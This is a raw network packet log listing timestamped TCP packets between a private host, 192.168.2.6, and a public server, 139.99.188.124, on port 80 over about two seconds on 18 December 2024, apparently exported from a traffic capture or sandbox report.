                                                                    Dec 18, 2024 09:19:23.860490084 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.860754967 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.865109921 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.865192890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.865391970 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.869816065 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.870019913 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.870090008 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.874552011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.874803066 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.874887943 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.879220009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.879338026 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.879462957 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.884274006 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.997313976 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.997328043 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.997433901 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.999100924 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.999252081 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.999272108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.002943039 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.003113985 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.020467997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.020513058 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.020608902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.021493912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.021646976 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.021776915 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.025101900 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.025192976 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.025551081 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.027945995 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.027970076 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.028008938 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.031510115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.031522989 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.032125950 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.035229921 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.035242081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.035310030 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.038664103 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.038781881 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.038928032 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.042246103 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.042373896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.042418957 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.045840979 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.045912981 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.045996904 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.049428940 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.049527884 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.049655914 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.053076029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.053368092 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.053441048 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.056622982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.056716919 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.056898117 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.060256004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.060321093 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.060405970 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.063786983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.063884974 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.063991070 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.067382097 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.067487001 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.067548990 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.070981026 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.071260929 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.071379900 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.074666023 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.074687004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.074855089 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.078202009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.078330994 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.078428030 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.082158089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.082179070 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.082297087 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.085427999 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.085479021 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.085608006 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.089163065 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.089180946 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.089302063 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.092799902 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.092927933 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.093000889 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.096163988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.096230030 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.096307993 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.099761009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.099827051 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.099879980 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.103343010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.103534937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.510282993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.510327101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.510327101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.510795116 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514261007 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514280081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514292002 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514303923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514316082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514336109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514338017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.514338017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.516748905 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.516829967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.516840935 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.516846895 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519752026 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.519798040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519810915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519820929 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519831896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519845009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.522188902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.522188902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.522819042 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.522831917 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.522851944 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.523029089 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.608715057 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.640680075 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.640868902 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.640948057 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.641216040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.641359091 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.641438961 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.642411947 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.642486095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.642635107 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.644610882 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.644648075 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.644720078 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.644751072 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.644828081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.645204067 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.646693945 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.646729946 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.646817923 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.647401094 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.647435904 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.648772001 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.648869991 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.648905993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.649226904 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.649281025 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.649327993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.649455070 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.650316000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.650490046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.650635958 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.651449919 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.651554108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.651735067 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.652559996 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.652729988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.652811050 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.653795004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.653851986 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.653909922 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.664314985 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664367914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664486885 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.664560080 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664805889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664927959 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.664994955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.665930033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.666004896 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.666069031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.667002916 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.667167902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.667387009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.668476105 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.668519020 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.668636084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.669280052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.669347048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.669382095 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.670377970 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.670592070 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.670805931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.671629906 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.671670914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.671689034 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.672677994 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.672749043 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.672816992 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.673789978 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.673830986 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.673840046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.675008059 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.675043106 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.675054073 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.676124096 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.676140070 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.676167011 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.677074909 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.677114964 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.677148104 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.678276062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.678287029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.678327084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.679254055 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.679353952 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.679486990 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.680382967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.680465937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.680490971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.681478977 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.681519985 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.681569099 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.682610035 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.682764053 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.682795048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.683753967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.683962107 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.684206009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.684819937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.684947014 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.684984922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.685971975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.686021090 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.686060905 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.687077045 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.687122107 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.687172890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.688297033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.688396931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.688474894 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.689610004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.689629078 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.689691067 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.690684080 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.690704107 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.690746069 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.691586971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.691690922 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.691725969 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.693254948 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.693274975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.693356991 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.694123983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.694143057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.694293022 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.695187092 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.695205927 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.695281029 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.696799040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.696815014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.697371960 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.697741032 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.697761059 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.697823048 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.698473930 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.698488951 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.698539019 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.699362040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.699470043 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.699575901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702831030 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702847958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702860117 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702871084 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702883959 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702934027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.703088999 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.703350067 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.703982115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.703994989 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.704332113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.705039024 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.705224991 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.706146955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.706162930 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.706471920 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.707381010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.707393885 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.707407951 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.707509995 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.708791971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.708805084 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.708916903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.709858894 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.709871054 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.709944963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.710627079 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.711419106 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.833863974 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833883047 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833894014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833904982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833916903 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833928108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833940983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833988905 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.833988905 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.837522984 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.074812889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.075845957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.075925112 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.075933933 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.076916933 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.077004910 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.077044010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.078197956 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.078288078 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.078435898 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.079159975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.079266071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.079332113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.080285072 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.080365896 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.080418110 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.081377029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.081501961 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.081578970 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.082515955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.082648993 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.082686901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.083606005 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.083647013 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.083775997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.084784985 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.084820032 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.085865974 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.085927010 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.085927010 CET4973880192.168.2.6139.99.188.124
